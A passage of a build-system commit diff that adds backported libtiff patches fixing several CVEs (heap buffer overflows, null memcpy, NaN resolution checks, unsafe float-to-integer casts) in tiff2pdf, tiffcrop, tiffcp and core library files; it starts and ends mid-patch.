+Subject: [PATCH] tiff2pdf.c: properly calculate datasize when saving to JPEG
+ YCbCr
+
+fixes #220
+Upstream-Status: Backport
+https://gitlab.com/libtiff/libtiff/-/commit/c6a12721b46f1a72974f91177890301730d7b330
+https://gitlab.com/libtiff/libtiff/-/merge_requests/159/commits
+CVE: CVE-2021-35524
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ tools/tiff2pdf.c | 11 ++++++++---
+ 1 file changed, 8 insertions(+), 3 deletions(-)
+
+diff --git a/tools/tiff2pdf.c b/tools/tiff2pdf.c
+index 719811ea..dc69d2f9 100644
+--- a/tools/tiff2pdf.c
++++ b/tools/tiff2pdf.c
+@@ -2087,9 +2087,14 @@ void t2p_read_tiff_size(T2P* t2p, TIFF* input){
+ #endif
+ (void) 0;
+ }
+- k = checkMultiply64(TIFFScanlineSize(input), t2p->tiff_length, t2p);
+- if(t2p->tiff_planar==PLANARCONFIG_SEPARATE){
+- k = checkMultiply64(k, t2p->tiff_samplesperpixel, t2p);
++ if(t2p->pdf_compression == T2P_COMPRESS_JPEG
++ && t2p->tiff_photometric == PHOTOMETRIC_YCBCR) {
++ k = checkMultiply64(TIFFNumberOfStrips(input), TIFFStripSize(input), t2p);
++ } else {
++ k = checkMultiply64(TIFFScanlineSize(input), t2p->tiff_length, t2p);
++ if(t2p->tiff_planar==PLANARCONFIG_SEPARATE){
++ k = checkMultiply64(k, t2p->tiff_samplesperpixel, t2p);
++ }
+ }
+ if (k == 0) {
+ /* Assume we had overflow inside TIFFScanlineSize */
+--
+GitLab
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2020-35524-2.patch b/meta/recipes-multimedia/libtiff/files/CVE-2020-35524-2.patch
new file mode 100644
index 0000000000..406d467766
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2020-35524-2.patch
@@ -0,0 +1,36 @@
+From d74f56e3b7ea55c8a18a03bc247cd5fd0ca288b2 Mon Sep 17 00:00:00 2001
+From: Thomas Bernard <miniupnp@free.fr>
+Date: Tue, 10 Nov 2020 02:05:05 +0100
+Subject: [PATCH] Fix for building without JPEG support
+
+Upstream-Status: Backport
+https://gitlab.com/libtiff/libtiff/-/commit/d74f56e3b7ea55c8a18a03bc247cd5fd0ca288b2
+https://gitlab.com/libtiff/libtiff/-/merge_requests/159/commits
+CVE: CVE-2021-35524
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ tools/tiff2pdf.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/tools/tiff2pdf.c b/tools/tiff2pdf.c
+index dc69d2f9..d0b0ede7 100644
+--- a/tools/tiff2pdf.c
++++ b/tools/tiff2pdf.c
+@@ -2087,10 +2087,13 @@ void t2p_read_tiff_size(T2P* t2p, TIFF* input){
+ #endif
+ (void) 0;
+ }
++#ifdef JPEG_SUPPORT
+ if(t2p->pdf_compression == T2P_COMPRESS_JPEG
+ && t2p->tiff_photometric == PHOTOMETRIC_YCBCR) {
+ k = checkMultiply64(TIFFNumberOfStrips(input), TIFFStripSize(input), t2p);
+- } else {
++ } else
++#endif
++ {
+ k = checkMultiply64(TIFFScanlineSize(input), t2p->tiff_length, t2p);
+ if(t2p->tiff_planar==PLANARCONFIG_SEPARATE){
+ k = checkMultiply64(k, t2p->tiff_samplesperpixel, t2p);
+--
+GitLab
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-0865.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-0865.patch
new file mode 100644
index 0000000000..e2d136f587
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-0865.patch
@@ -0,0 +1,39 @@
+From a1c933dabd0e1c54a412f3f84ae0aa58115c6067 Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Thu, 24 Feb 2022 22:26:02 +0100
+Subject: [PATCH] tif_jbig.c: fix crash when reading a file with multiple IFD
+ in memory-mapped mode and when bit reversal is needed (fixes #385)
+
+CVE: CVE-2022-0865
+Upstream-Status: Backport [https://sources.debian.org/src/tiff/4.1.0+git191117-2%7Edeb10u4/debian/patches/CVE-2022-0865.patch/]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comment: No change in any hunk
+
+---
+ libtiff/tif_jbig.c | 10 ++++++++++
+ 1 file changed, 10 insertions(+)
+
+diff --git a/libtiff/tif_jbig.c b/libtiff/tif_jbig.c
+index 74086338..8bfa4cef 100644
+--- a/libtiff/tif_jbig.c
++++ b/libtiff/tif_jbig.c
+@@ -208,6 +208,16 @@ int TIFFInitJBIG(TIFF* tif, int scheme)
+ */
+ tif->tif_flags |= TIFF_NOBITREV;
+ tif->tif_flags &= ~TIFF_MAPPED;
++ /* We may have read from a previous IFD and thus set TIFF_BUFFERMMAP and
++ * cleared TIFF_MYBUFFER. It is necessary to restore them to their initial
++ * value to be consistent with the state of a non-memory mapped file.
++ */
++ if (tif->tif_flags&TIFF_BUFFERMMAP) {
++ tif->tif_rawdata = NULL;
++ tif->tif_rawdatasize = 0;
++ tif->tif_flags &= ~TIFF_BUFFERMMAP;
++ tif->tif_flags |= TIFF_MYBUFFER;
++ }
+
+ /* Setup the function pointers for encode, decode, and cleanup. */
+ tif->tif_setupdecode = JBIGSetupDecode;
+--
+GitLab
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-0891.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-0891.patch
new file mode 100644
index 0000000000..e2f1bd3056
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-0891.patch
@@ -0,0 +1,217 @@
+From 232282fd8f9c21eefe8d2d2b96cdbbb172fe7b7c Mon Sep 17 00:00:00 2001
+From: Su Laus <sulau@freenet.de>
+Date: Tue, 8 Mar 2022 17:02:44 +0000
+Subject: [PATCH] tiffcrop: fix issue #380 and #382 heap buffer overflow in
+ extractImageSection
+
+CVE: CVE-2022-0891
+Upstream-Status: Backport [https://sources.debian.org/src/tiff/4.1.0+git191117-2%7Edeb10u4/debian/patches/CVE-2022-0891.patch/]
+Comment: No change in any hunk
+Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
+---
+ tools/tiffcrop.c | 92 +++++++++++++++++++-----------------------------
+ 1 file changed, 36 insertions(+), 56 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index f2e5474a..e62bcc71 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -105,8 +105,8 @@
+ * of messages to monitor progess without enabling dump logs.
+ */
+
+-static char tiffcrop_version_id[] = "2.4";
+-static char tiffcrop_rev_date[] = "12-13-2010";
++static char tiffcrop_version_id[] = "2.4.1";
++static char tiffcrop_rev_date[] = "03-03-2010";
+
+ #include "tif_config.h"
+ #include "tiffiop.h"
+@@ -6670,10 +6670,10 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+ #ifdef DEVELMODE
+ uint32 img_length;
+ #endif
+- uint32 j, shift1, shift2, trailing_bits;
++ uint32 j, shift1, trailing_bits;
+ uint32 row, first_row, last_row, first_col, last_col;
+ uint32 src_offset, dst_offset, row_offset, col_offset;
+- uint32 offset1, offset2, full_bytes;
++ uint32 offset1, full_bytes;
+ uint32 sect_width;
+ #ifdef DEVELMODE
+ uint32 sect_length;
+@@ -6683,7 +6683,6 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+ #ifdef DEVELMODE
+ int k;
+ unsigned char bitset;
+- static char *bitarray = NULL;
+ #endif
+
+ img_width = image->width;
+@@ -6701,17 +6700,12 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+ dst_offset = 0;
+
+ #ifdef DEVELMODE
+- if (bitarray == NULL)
+- {
+- if ((bitarray = (char *)malloc(img_width)) == NULL)
+- {
+- TIFFError ("", "DEBUG: Unable to allocate debugging bitarray");
+- return (-1);
+- }
+- }
++ char bitarray[39];
+ #endif
+
+- /* rows, columns, width, length are expressed in pixels */
++ /* rows, columns, width, length are expressed in pixels
++ * first_row, last_row, .. are index into image array starting at 0 to width-1,
++ * last_col shall be also extracted. */
+ first_row = section->y1;
+ last_row = section->y2;
+ first_col = section->x1;
+@@ -6721,9 +6715,14 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+ #ifdef DEVELMODE
+ sect_length = last_row - first_row + 1;
+ #endif
+- img_rowsize = ((img_width * bps + 7) / 8) * spp;
+- full_bytes = (sect_width * spp * bps) / 8; /* number of COMPLETE bytes per row in section */
+- trailing_bits = (sect_width * bps) % 8;
++ /* The read function loadImage() used copy separate plane data into a buffer as interleaved
++ * samples rather than separate planes so the same logic works to extract regions
++ * regardless of the way the data are organized in the input file.
++ * Furthermore, bytes and bits are arranged in buffer according to COMPRESSION=1 and FILLORDER=1
++ */
++ img_rowsize = (((img_width * spp * bps) + 7) / 8); /* row size in full bytes of source image */
++ full_bytes = (sect_width * spp * bps) / 8; /* number of COMPLETE bytes per row in section */
++ trailing_bits = (sect_width * spp * bps) % 8; /* trailing bits within the last byte of destination buffer */
+
+ #ifdef DEVELMODE
+ TIFFError ("", "First row: %d, last row: %d, First col: %d, last col: %d\n",
+@@ -6736,10 +6735,9 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+
+ if ((bps % 8) == 0)
+ {
+- col_offset = first_col * spp * bps / 8;
++ col_offset = (first_col * spp * bps) / 8;
+ for (row = first_row; row <= last_row; row++)
+ {
+- /* row_offset = row * img_width * spp * bps / 8; */
+ row_offset = row * img_rowsize;
+ src_offset = row_offset + col_offset;
+
+@@ -6752,14 +6750,12 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+ }
+ else
+ { /* bps != 8 */
+- shift1 = spp * ((first_col * bps) % 8);
+- shift2 = spp * ((last_col * bps) % 8);
++ shift1 = ((first_col * spp * bps) % 8); /* shift1 = bits to skip in the first byte of source buffer*/
+ for (row = first_row; row <= last_row; row++)
+ {
+ /* pull out the first byte */
+ row_offset = row * img_rowsize;
+- offset1 = row_offset + (first_col * bps / 8);
+- offset2 = row_offset + (last_col * bps / 8);
++ offset1 = row_offset + ((first_col * spp * bps) / 8); /* offset1 = offset into source of byte with first bits to be extracted */
+
+ #ifdef DEVELMODE
+ for (j = 0, k = 7; j < 8; j++, k--)
+@@ -6771,12 +6767,12 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+ sprintf(&bitarray[9], " ");
+ for (j = 10, k = 7; j < 18; j++, k--)
+ {
+- bitset = *(src_buff + offset2) & (((unsigned char)1 << k)) ? 1 : 0;
++ bitset = *(src_buff + offset1 + full_bytes) & (((unsigned char)1 << k)) ? 1 : 0;
+ sprintf(&bitarray[j], (bitset) ? "1" : "0");
+ }
+ bitarray[18] = '\0';
+- TIFFError ("", "Row: %3d Offset1: %d, Shift1: %d, Offset2: %d, Shift2: %d\n",
+- row, offset1, shift1, offset2, shift2);
++ TIFFError ("", "Row: %3d Offset1: %"PRIu32", Shift1: %"PRIu32", Offset2: %"PRIu32", Trailing_bits: %"PRIu32"\n",
++ row, offset1, shift1, offset1+full_bytes, trailing_bits);
+ #endif
+
+ bytebuff1 = bytebuff2 = 0;
+@@ -6800,11 +6796,12 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+
+ if (trailing_bits != 0)
+ {
+- bytebuff2 = src_buff[offset2] & ((unsigned char)255 << (7 - shift2));
++ /* Only copy higher bits of samples and mask lower bits of not wanted column samples to zero */
++ bytebuff2 = src_buff[offset1 + full_bytes] & ((unsigned char)255 << (8 - trailing_bits));
+ sect_buff[dst_offset] = bytebuff2;
+ #ifdef DEVELMODE
+ TIFFError ("", " Trailing bits src offset: %8d, Dst offset: %8d\n",
+- offset2, dst_offset);
++ offset1 + full_bytes, dst_offset);
+ for (j = 30, k = 7; j < 38; j++, k--)
+ {
+ bitset = *(sect_buff + dst_offset) & (((unsigned char)1 << k)) ? 1 : 0;
+@@ -6823,8 +6820,10 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+ #endif
+ for (j = 0; j <= full_bytes; j++)
+ {
+- bytebuff1 = src_buff[offset1 + j] & ((unsigned char)255 >> shift1);
+- bytebuff2 = src_buff[offset1 + j + 1] & ((unsigned char)255 << (7 - shift1));
++ /* Skip the first shift1 bits and shift the source up by shift1 bits before save to destination.*/
++ /* Attention: src_buff size needs to be some bytes larger than image size, because could read behind image here. */
++ bytebuff1 = src_buff[offset1 + j] & ((unsigned char)255 >> shift1);
++ bytebuff2 = src_buff[offset1 + j + 1] & ((unsigned char)255 << (8 - shift1));
+ sect_buff[dst_offset + j] = (bytebuff1 << shift1) | (bytebuff2 >> (8 - shift1));
+ }
+ #ifdef DEVELMODE
+@@ -6840,36 +6839,17 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+ #endif
+ dst_offset += full_bytes;
+
++ /* Copy the trailing_bits for the last byte in the destination buffer.
++ Could come from one ore two bytes of the source buffer. */
+ if (trailing_bits != 0)
+ {
+ #ifdef DEVELMODE
+- TIFFError ("", " Trailing bits src offset: %8d, Dst offset: %8d\n", offset1 + full_bytes, dst_offset);
+-#endif
+- if (shift2 > shift1)
+- {
+- bytebuff1 = src_buff[offset1 + full_bytes] & ((unsigned char)255 << (7 - shift2));
+- bytebuff2 = bytebuff1 & ((unsigned char)255 << shift1);
+- sect_buff[dst_offset] = bytebuff2;
+-#ifdef DEVELMODE
+- TIFFError ("", " Shift2 > Shift1\n");
++ TIFFError("", " Trailing bits %4"PRIu32" src offset: %8"PRIu32", Dst offset: %8"PRIu32"\n", trailing_bits, offset1 + full_bytes, dst_offset);
+ #endif
++ /* More than necessary bits are already copied into last destination buffer,
++ * only masking of last byte in destination buffer is necessary.*/
++ sect_buff[dst_offset] &= ((uint8_t)0xFF << (8 - trailing_bits));
+ }
+- else
+- {
+- if (shift2 < shift1)
+- {
+- bytebuff2 = ((unsigned char)255 << (shift1 - shift2 - 1));
+- sect_buff[dst_offset] &= bytebuff2;
+-#ifdef DEVELMODE
+- TIFFError ("", " Shift2 < Shift1\n");
+-#endif
+- }
+-#ifdef DEVELMODE
+- else
+- TIFFError ("", " Shift2 == Shift1\n");
+-#endif
+- }
+- }
+ #ifdef DEVELMODE
+ sprintf(&bitarray[28], " ");
+ sprintf(&bitarray[29], " ");
+@@ -7022,7 +7002,7 @@ writeImageSections(TIFF *in, TIFF *out, struct image_data *image,
+ width = sections[i].x2 - sections[i].x1 + 1;
+ length = sections[i].y2 - sections[i].y1 + 1;
+ sectsize = (uint32)
+- ceil((width * image->bps + 7) / (double)8) * image->spp * length;
++ ceil((width * image->bps * image->spp + 7) / (double)8) * length;
+ /* allocate a buffer if we don't have one already */
+ if (createImageSection(sectsize, sect_buff_ptr))
+ {
+--
+GitLab
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-0907.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-0907.patch
new file mode 100644
index 0000000000..da3ead5481
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-0907.patch
@@ -0,0 +1,94 @@
+From 40b00cfb32256d377608b4d4cd30fac338d0a0bc Mon Sep 17 00:00:00 2001
+From: Augustus <wangdw.augustus@qq.com>
+Date: Mon, 7 Mar 2022 18:21:49 +0800
+Subject: [PATCH] add checks for return value of limitMalloc (#392)
+
+CVE: CVE-2022-0907
+Upstream-Status: Backport [https://sources.debian.org/src/tiff/4.1.0+git191117-2%7Edeb10u4/debian/patches/CVE-2022-0907.patch/]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comment: No change in any hunk
+
+---
+ tools/tiffcrop.c | 33 +++++++++++++++++++++------------
+ 1 file changed, 21 insertions(+), 12 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index f2e5474a..9b8acc7e 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -7337,7 +7337,11 @@ createImageSection(uint32_t sectsize, unsigned char **sect_buff_ptr)
+ if (!sect_buff)
+ {
+ sect_buff = (unsigned char *)_TIFFmalloc(sectsize);
+- *sect_buff_ptr = sect_buff;
++ if (!sect_buff)
++ {
++ TIFFError("createImageSection", "Unable to allocate/reallocate section buffer");
++ return (-1);
++ }
+ _TIFFmemset(sect_buff, 0, sectsize);
+ }
+ else
+@@ -7353,15 +7357,15 @@ createImageSection(uint32_t sectsize, unsigned char **sect_buff_ptr)
+ else
+ sect_buff = new_buff;
+
++ if (!sect_buff)
++ {
++ TIFFError("createImageSection", "Unable to allocate/reallocate section buffer");
++ return (-1);
++ }
+ _TIFFmemset(sect_buff, 0, sectsize);
+ }
+ }
+
+- if (!sect_buff)
+- {
+- TIFFError("createImageSection", "Unable to allocate/reallocate section buffer");
+- return (-1);
+- }
+ prev_sectsize = sectsize;
+ *sect_buff_ptr = sect_buff;
+
+@@ -7628,7 +7632,11 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
+ if (!crop_buff)
+ {
+ crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
+- *crop_buff_ptr = crop_buff;
++ if (!crop_buff)
++ {
++ TIFFError("createCroppedImage", "Unable to allocate/reallocate crop buffer");
++ return (-1);
++ }
+ _TIFFmemset(crop_buff, 0, cropsize);
+ prev_cropsize = cropsize;
+ }
+@@ -7644,15 +7652,15 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
+ }
+ else
+ crop_buff = new_buff;
++ if (!crop_buff)
++ {
++ TIFFError("createCroppedImage", "Unable to allocate/reallocate crop buffer");
++ return (-1);
++ }
+ _TIFFmemset(crop_buff, 0, cropsize);
+ }
+ }
+
+- if (!crop_buff)
+- {
+- TIFFError("createCroppedImage", "Unable to allocate/reallocate crop buffer");
+- return (-1);
+- }
+ *crop_buff_ptr = crop_buff;
+
+ if (crop->crop_mode & CROP_INVERT)
+@@ -9211,3 +9219,4 @@ invertImage(uint16_t photometric, uint16_t spp, uint16_t bps, uint32_t width, ui
+ * fill-column: 78
+ * End:
+ */
++
+--
+GitLab
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-0908.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-0908.patch
new file mode 100644
index 0000000000..e65af6c600
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-0908.patch
@@ -0,0 +1,34 @@
+From a95b799f65064e4ba2e2dfc206808f86faf93e85 Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Thu, 17 Feb 2022 15:28:43 +0100
+Subject: [PATCH] TIFFFetchNormalTag(): avoid calling memcpy() with a null
+ source pointer and size of zero (fixes #383)
+
+CVE: CVE-2022-0908
+Upstream-Status: Backport [https://sources.debian.org/src/tiff/4.1.0+git191117-2%7Edeb10u4/debian/patches/CVE-2022-0908.patch/]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comment: No change in any hunk
+
+---
+ libtiff/tif_dirread.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/libtiff/tif_dirread.c b/libtiff/tif_dirread.c
+index 50ebf8ac..2ec44a4f 100644
+--- a/libtiff/tif_dirread.c
++++ b/libtiff/tif_dirread.c
+@@ -5021,7 +5021,10 @@ TIFFFetchNormalTag(TIFF* tif, TIFFDirEntry* dp, int recover)
+ _TIFFfree(data);
+ return(0);
+ }
+- _TIFFmemcpy(o,data,(uint32)dp->tdir_count);
++ if (dp->tdir_count > 0 )
++ {
++ _TIFFmemcpy(o,data,(uint32)dp->tdir_count);
++ }
+ o[(uint32)dp->tdir_count]=0;
+ if (data!=0)
+ _TIFFfree(data);
+--
+GitLab
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-0909.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-0909.patch
new file mode 100644
index 0000000000..d487f1bd95
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-0909.patch
@@ -0,0 +1,37 @@
+From 32ea0722ee68f503b7a3f9b2d557acb293fc8cde Mon Sep 17 00:00:00 2001
+From: 4ugustus <wangdw.augustus@qq.com>
+Date: Tue, 8 Mar 2022 16:22:04 +0000
+Subject: [PATCH] fix the FPE in tiffcrop (#393)
+
+CVE: CVE-2022-0909
+Upstream-Status: Backport [https://sources.debian.org/src/tiff/4.1.0+git191117-2%7Edeb10u4/debian/patches/CVE-2022-0909.patch/]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comment: No change in any hunk
+
+---
+ libtiff/tif_dir.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/libtiff/tif_dir.c b/libtiff/tif_dir.c
+index 57055ca9..59b346ca 100644
+--- a/libtiff/tif_dir.c
++++ b/libtiff/tif_dir.c
+@@ -334,13 +334,13 @@ _TIFFVSetField(TIFF* tif, uint32_t tag, va_list ap)
+ break;
+ case TIFFTAG_XRESOLUTION:
+ dblval = va_arg(ap, double);
+- if( dblval < 0 )
++ if( dblval != dblval || dblval < 0 )
+ goto badvaluedouble;
+ td->td_xresolution = _TIFFClampDoubleToFloat( dblval );
+ break;
+ case TIFFTAG_YRESOLUTION:
+ dblval = va_arg(ap, double);
+- if( dblval < 0 )
++ if( dblval != dblval || dblval < 0 )
+ goto badvaluedouble;
+ td->td_yresolution = _TIFFClampDoubleToFloat( dblval );
+ break;
+--
+GitLab
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-0924.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-0924.patch
new file mode 100644
index 0000000000..ddb035c972
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-0924.patch
@@ -0,0 +1,58 @@
+From 88d79a45a31c74cba98c697892fed5f7db8b963a Mon Sep 17 00:00:00 2001
+From: 4ugustus <wangdw.augustus@qq.com>
+Date: Thu, 10 Mar 2022 08:48:00 +0000
+Subject: [PATCH] fix heap buffer overflow in tiffcp (#278)
+
+CVE: CVE-2022-0924
+Upstream-Status: Backport [https://sources.debian.org/src/tiff/4.1.0+git191117-2%7Edeb10u4/debian/patches/CVE-2022-0924.patch/]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comment: No change in any hunk
+
+---
+ tools/tiffcp.c | 17 ++++++++++++++++-
+ 1 file changed, 16 insertions(+), 1 deletion(-)
+
+diff --git a/tools/tiffcp.c b/tools/tiffcp.c
+index 224583e0..aa32b118 100644
+--- a/tools/tiffcp.c
++++ b/tools/tiffcp.c
+@@ -1524,12 +1524,27 @@ DECLAREwriteFunc(writeBufferToSeparateSt
+ tdata_t obuf;
+ tstrip_t strip = 0;
+ tsample_t s;
++ uint16 bps = 0, bytes_per_sample;
+
+ obuf = _TIFFmalloc(stripsize);
+ if (obuf == NULL)
+ return (0);
+ _TIFFmemset(obuf, 0, stripsize);
+ (void) TIFFGetFieldDefaulted(out, TIFFTAG_ROWSPERSTRIP, &rowsperstrip);
++ (void) TIFFGetField(out, TIFFTAG_BITSPERSAMPLE, &bps);
++ if( bps == 0 )
++ {
++ TIFFError(TIFFFileName(out), "Error, cannot read BitsPerSample");
++ _TIFFfree(obuf);
++ return 0;
++ }
++ if( (bps % 8) != 0 )
++ {
++ TIFFError(TIFFFileName(out), "Error, cannot handle BitsPerSample that is not a multiple of 8");
++ _TIFFfree(obuf);
++ return 0;
++ }
++ bytes_per_sample = bps/8;
+ for (s = 0; s < spp; s++) {
+ uint32 row;
+ for (row = 0; row < imagelength; row += rowsperstrip) {
+@@ -1539,7 +1539,7 @@ DECLAREwriteFunc(writeBufferToSeparateSt
+
+ cpContigBufToSeparateBuf(
+ obuf, (uint8*) buf + row*rowsize + s,
+- nrows, imagewidth, 0, 0, spp, 1);
++ nrows, imagewidth, 0, 0, spp, bytes_per_sample);
+ if (TIFFWriteEncodedStrip(out, strip++, obuf, stripsize) < 0) {
+ TIFFError(TIFFFileName(out),
+ "Error, can't write strip %u",
+--
+GitLab
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-2056-CVE-2022-2057-CVE-2022-2058.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-2056-CVE-2022-2057-CVE-2022-2058.patch
new file mode 100644
index 0000000000..01e81349a2
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-2056-CVE-2022-2057-CVE-2022-2058.patch
@@ -0,0 +1,183 @@
+From 8261237113a53cd21029c4a8cbb62c47b4c19523 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Wed, 27 Jul 2022 11:30:18 +0530
+Subject: [PATCH] CVE-2022-2056 CVE-2022-2057 CVE-2022-2058
+
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/dd1bcc7abb26094e93636e85520f0d8f81ab0fab]
+CVE: CVE-2022-2056 CVE-2022-2057 CVE-2022-2058
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ libtiff/tif_aux.c | 9 +++++++
+ libtiff/tiffiop.h | 1 +
+ tools/tiffcrop.c | 62 ++++++++++++++++++++++++++---------------------
+ 3 files changed, 44 insertions(+), 28 deletions(-)
+
+diff --git a/libtiff/tif_aux.c b/libtiff/tif_aux.c
+index 8188db5..3dac542 100644
+--- a/libtiff/tif_aux.c
++++ b/libtiff/tif_aux.c
+@@ -402,6 +402,15 @@ float _TIFFClampDoubleToFloat( double val )
+ return (float)val;
+ }
+
++uint32 _TIFFClampDoubleToUInt32(double val)
++{
++ if( val < 0 )
++ return 0;
++ if( val > 0xFFFFFFFFU || val != val )
++ return 0xFFFFFFFFU;
++ return (uint32)val;
++}
++
+ int _TIFFSeekOK(TIFF* tif, toff_t off)
+ {
+ /* Huge offsets, especially -1 / UINT64_MAX, can cause issues */
+diff --git a/libtiff/tiffiop.h b/libtiff/tiffiop.h
+index 45a7932..c6f6f93 100644
+--- a/libtiff/tiffiop.h
++++ b/libtiff/tiffiop.h
+@@ -393,6 +393,7 @@ extern double _TIFFUInt64ToDouble(uint64);
+ extern float _TIFFUInt64ToFloat(uint64);
+
+ extern float _TIFFClampDoubleToFloat(double);
++extern uint32 _TIFFClampDoubleToUInt32(double);
+
+ extern tmsize_t
+ _TIFFReadEncodedStripAndAllocBuffer(TIFF* tif, uint32 strip,
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index c2c2052..79dd0a0 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -5141,17 +5141,17 @@ computeInputPixelOffsets(struct crop_mask *crop, struct image_data *image,
+ {
+ if ((crop->res_unit == RESUNIT_INCH) || (crop->res_unit == RESUNIT_CENTIMETER))
+ {
+- x1 = (uint32) (crop->corners[i].X1 * scale * xres);
+- x2 = (uint32) (crop->corners[i].X2 * scale * xres);
+- y1 = (uint32) (crop->corners[i].Y1 * scale * yres);
+- y2 = (uint32) (crop->corners[i].Y2 * scale * yres);
++ x1 = _TIFFClampDoubleToUInt32(crop->corners[i].X1 * scale * xres);
++ x2 = _TIFFClampDoubleToUInt32(crop->corners[i].X2 * scale * xres);
++ y1 = _TIFFClampDoubleToUInt32(crop->corners[i].Y1 * scale * yres);
++ y2 = _TIFFClampDoubleToUInt32(crop->corners[i].Y2 * scale * yres);
+ }
+ else
+ {
+- x1 = (uint32) (crop->corners[i].X1);
+- x2 = (uint32) (crop->corners[i].X2);
+- y1 = (uint32) (crop->corners[i].Y1);
+- y2 = (uint32) (crop->corners[i].Y2);
++ x1 = _TIFFClampDoubleToUInt32(crop->corners[i].X1);
++ x2 = _TIFFClampDoubleToUInt32(crop->corners[i].X2);
++ y1 = _TIFFClampDoubleToUInt32(crop->corners[i].Y1);
++ y2 = _TIFFClampDoubleToUInt32(crop->corners[i].Y2);
+ }
+ if (x1 < 1)
+ crop->regionlist[i].x1 = 0;
+@@ -5214,17 +5214,17 @@ computeInputPixelOffsets(struct crop_mask *crop, struct image_data *image,
+ {
+ if (crop->res_unit != RESUNIT_INCH && crop->res_unit != RESUNIT_CENTIMETER)
+ { /* User has specified pixels as reference unit */
+- tmargin = (uint32)(crop->margins[0]);
+- lmargin = (uint32)(crop->margins[1]);
+- bmargin = (uint32)(crop->margins[2]);
+- rmargin = (uint32)(crop->margins[3]);
++ tmargin = _TIFFClampDoubleToUInt32(crop->margins[0]);
++ lmargin = _TIFFClampDoubleToUInt32(crop->margins[1]);
++ bmargin = _TIFFClampDoubleToUInt32(crop->margins[2]);
++ rmargin = _TIFFClampDoubleToUInt32(crop->margins[3]);
+ }
+ else
+ { /* inches or centimeters specified */
+- tmargin = (uint32)(crop->margins[0] * scale * yres);
+- lmargin = (uint32)(crop->margins[1] * scale * xres);
+- bmargin = (uint32)(crop->margins[2] * scale * yres);
+- rmargin = (uint32)(crop->margins[3] * scale * xres);
++ tmargin = _TIFFClampDoubleToUInt32(crop->margins[0] * scale * yres);
++ lmargin = _TIFFClampDoubleToUInt32(crop->margins[1] * scale * xres);
++ bmargin = _TIFFClampDoubleToUInt32(crop->margins[2] * scale * yres);
++ rmargin = _TIFFClampDoubleToUInt32(crop->margins[3] * scale * xres);
+ }
+
+ if ((lmargin + rmargin) > image->width)
+@@ -5254,24 +5254,24 @@ computeInputPixelOffsets(struct crop_mask *crop, struct image_data *image,
+ if (crop->res_unit != RESUNIT_INCH && crop->res_unit != RESUNIT_CENTIMETER)
+ {
+ if (crop->crop_mode & CROP_WIDTH)
+- width = (uint32)crop->width;
++ width = _TIFFClampDoubleToUInt32(crop->width);
+ else
+ width = image->width - lmargin - rmargin;
+
+ if (crop->crop_mode & CROP_LENGTH)
+- length = (uint32)crop->length;
